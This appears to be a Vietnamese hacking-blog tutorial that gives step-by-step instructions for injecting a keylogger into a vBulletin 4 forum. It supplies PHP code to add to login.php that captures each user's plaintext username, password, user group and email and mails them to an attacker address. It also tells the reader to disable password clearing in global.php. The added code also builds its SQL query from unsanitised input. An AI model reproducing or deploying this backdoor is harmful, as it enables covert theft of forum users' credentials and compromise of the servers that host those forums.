_Hướng dẫn - Chèn Keylogger vào vBB

Đã test trên VBB 4.0 beta 5: OK
Edit file login.php:
Tìm:
Quote:
process_new_login($vbulletin->GPC['logintype'], $vbulletin->GPC['cookieuser'], $vbulletin->GPC['cssprefs']);
Thêm bên dưới:
Quote:
$lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
$lg_password = $vbulletin->GPC["vb_login_password"];
$sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
while($row = @mysql_fetch_array($sql_query))
{
if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
{
$from = $row["usergroupid"].' | '.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
$to = "Attacker@email";
$message = $row["usergroupid"] . ' | ' . $lg_username . ' | ' . $lg_password. ' | ' . $row["email"] . "\n";
$header = "Content-type: text/html; charset=utf-8\r\nFrom: $from\r\nReply-to: $to";
mail($to, $from, $message, $header);
}
Edit file Global.php, tìm:
Quote:
$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;
Thêm 2 dấu / vào trước nó để biến nó thành chú thích, ta sẽ được:

Quote:
//
Quote:
$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') ? 1 : 0;

HOẶC delete line đó đi.

Chú Ý:

Coppy phải ghi rõ nguồn Blog - Hacking
 

Copyright © 123 H4ck' Blog. Cung cấp bởi Blogger